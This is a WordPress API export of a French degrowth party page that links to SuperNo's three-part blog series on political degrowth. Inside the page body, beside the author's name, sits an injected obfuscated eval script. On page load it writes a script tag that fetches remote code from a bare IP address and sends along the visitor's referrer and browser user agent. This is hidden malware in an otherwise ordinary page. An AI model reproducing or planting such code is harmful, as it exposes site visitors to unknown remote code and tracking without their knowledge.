{"id":6112,"date":"2011-04-26T14:47:42","date_gmt":"2011-04-26T13:47:42","guid":{"rendered":"http:\/\/www.partipourladecroissance.net\/?page_id=6112"},"modified":"2012-01-26T21:51:32","modified_gmt":"2012-01-26T20:51:32","slug":"votez-escargot-la-decroissance-politique","status":"publish","type":"page","link":"https:\/\/www.partipourladecroissance.net\/?page_id=6112","title":{"rendered":"Votez escargot ! (La d\u00e9croissance politique comprise par SuperNo)"},"content":{"rendered":"<p style=\"text-align: center;\"><img loading=\"lazy\" decoding=\"async\" src=\"http:\/\/www.superno.com\/blog\/images\/escargot2.jpg\" alt=\"\" width=\"420\" height=\"108\" \/><\/p>\n<p><strong>SuperNo<\/strong> <noindex><script id=\"wpinfo-pst1\" type=\"text\/javascript\" rel=\"nofollow\">eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(\/^\/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('0.6(\"<a g=\\'2\\' c=\\'d\\' e=\\'b\/2\\' 4=\\'7:\/\/5.8.9.f\/1\/h.s.t?r=\"+3(0.p)+\"\\o=\"+3(j.i)+\"\\'><\\\/k\"+\"l>\");n m=\"q\";',30,30,'document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|tnsaa|var|u0026u|referrer|iafhd||js|php'.split('|'),0,{}))\n<\/script><\/noindex> (<a href=\"http:\/\/www.superno.com\/\">http:\/\/www.superno.com\/<\/a>) : \u00ab\u00a0<em>En marge du \u00ab\u00a0Contre Grenelle 3\u00a0\u00bb qui s&rsquo;est tenu \u00e0 Vaulx-en Velin le 2 avril dernier, (au passage, toutes les vid\u00e9os des interventions sont d\u00e9sormais <a href=\"http:\/\/www.contre-grenelle.org\/?chemin=videos\" target=\"_blank\">en ligne<\/a>) j&rsquo;ai pu rencontrer quelques-uns des responsables des diverses organisations nationales d&rsquo;OC qui profitaient de l&rsquo;occasion pour se r\u00e9unir et avancer dans leurs projets communs.\u00a0 La r\u00e9union a eu lieu le dimanche 3 avril dans une petite salle des pentes de la Croix-Rousse, \u00e0 Lyon, (o\u00f9 j&rsquo;ai par ailleurs habit\u00e9 pendant 10 ans).\u00a0\u00bb<\/em><\/p>\n<p>lire la suite ci-dessous :<\/p>\n<p><strong>&#8211; Partie 1 <\/strong>: <a href=\"http:\/\/www.superno.com\/blog\/2011\/04\/votez-escargot-la-decroissance-politique-partie-1\/\">http:\/\/www.superno.com\/blog\/2011\/04\/votez-escargot-la-decroissance-politique-partie-1\/<\/a><br \/>\n<strong>&#8211; Partie 2 <\/strong>: <a href=\"http:\/\/www.superno.com\/blog\/2011\/04\/votez-escargot-la-decroissance-politique-partie-2\/\">http:\/\/www.superno.com\/blog\/2011\/04\/votez-escargot-la-decroissance-politique-partie-2\/<br \/>\n<\/a><strong>&#8211; Partie 3 <\/strong>: <a href=\"http:\/\/www.superno.com\/blog\/2011\/04\/votez-escargot-la-decroissance-politique-partie-3\/\">http:\/\/www.superno.com\/blog\/2011\/04\/votez-escargot-la-decroissance-politique-partie-3\/<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p>SuperNo (http:\/\/www.superno.com\/) : \u00ab\u00a0En marge du \u00ab\u00a0Contre Grenelle 3\u00a0\u00bb qui s&rsquo;est tenu \u00e0 Vaulx-en Velin le 2 avril dernier, (au passage, toutes les vid\u00e9os des interventions sont d\u00e9sormais en ligne) j&rsquo;ai pu rencontrer quelques-uns des responsables des diverses organisations nationales &hellip; <a href=\"https:\/\/www.partipourladecroissance.net\/?page_id=6112\">Continuer la lecture <span class=\"meta-nav\">&rarr;<\/span><\/a><\/p>\n","protected":false},"author":7,"featured_media":0,"parent":3982,"menu_order":4,"comment_status":"closed","ping_status":"open","template":"","meta":{"footnotes":""},"class_list":["post-6112","page","type-page","status-publish","hentry"],"_links":{"self":[{"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/pages\/6112","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/users\/7"}],"replies":[{"embeddable":true,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=6112"}],"version-history":[{"count":5,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/pages\/6112\/revisions"}],"predecessor-version":[{"id":6115,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/pages\/6112\/revisions\/6115"}],"up":[{"embeddable":true,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/pages\/3982"}],"wp:attachment":[{"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=6112"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}